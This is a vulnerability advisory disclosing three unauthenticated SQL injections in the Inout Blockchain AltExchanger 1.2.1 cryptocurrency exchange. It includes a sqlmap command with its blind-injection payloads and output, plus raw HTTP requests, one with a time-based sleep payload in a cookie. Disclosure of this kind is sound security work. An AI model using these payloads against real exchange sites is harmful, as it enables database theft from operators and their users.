Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Information

Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchanger
Product             : Inout Blockchain AltExchanger
version             : 1.2.1
Date                : 2022-05-21
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/
Exploit Detail      : https://github.com/bigb0x/CVEs/Blockchain-AltExchanger-121-sqli.md
CVE-Number          : CVE-2022-31487, CVE-2022-31488, CVE-2022-31489
Exploit Author      : Mohamed N. Ali @MohamedNab1l

Description


Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.

1- Vulnerable Parameter: symbol (GET)


Vulnerability File:

/application/third_party/Chart/TradingView/chart_content/master.php

Sqlmap command:

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db

output:

Parameter: symbol (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO
[16:43:22] [INFO] testing MySQL
[16:43:23] [INFO] confirming MySQL
[16:43:26] [INFO] the back-end DBMS is MySQL
[16:43:26] [INFO] fetching banner
[16:43:26] [INFO] resumed: 5.6.50
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.50'
[16:43:26] [INFO] fetching current database
[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_db
current database: 'inout_blockchain_altexchanger_db'


2- Vulnerable Parameter: marketcurrency (POST)


Vulnerability File:

/index.php/coins/update_marketboxslider

HTTP Request:


POST /index.php/coins/update_marketboxslider HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://vulnerable-host.com/
Cookie: inoutio_language=4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 69
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vulnerable-host.com
Connection: Keep-alive
displaylimit=4&marketcurrency=-INJEQT-SQL-HERE


3- Vulnerable Parameter: Cookie: inoutio_language (GET)


Vulnerability File:

/index.php

HTTP Request:


GET /index.php/home/about HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
x-requested-with: XMLHttpRequest
Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: vulnerable-host.com
Connection: Keep-alive


Timeline

2022-05-03: Discovered the bug
2022-05-03: Reported to vendor
2022-05-21: Advisory published

Discovered by

Mohamed N. Ali
@MohamedNab1l
ali.mohamed{at}gmail.com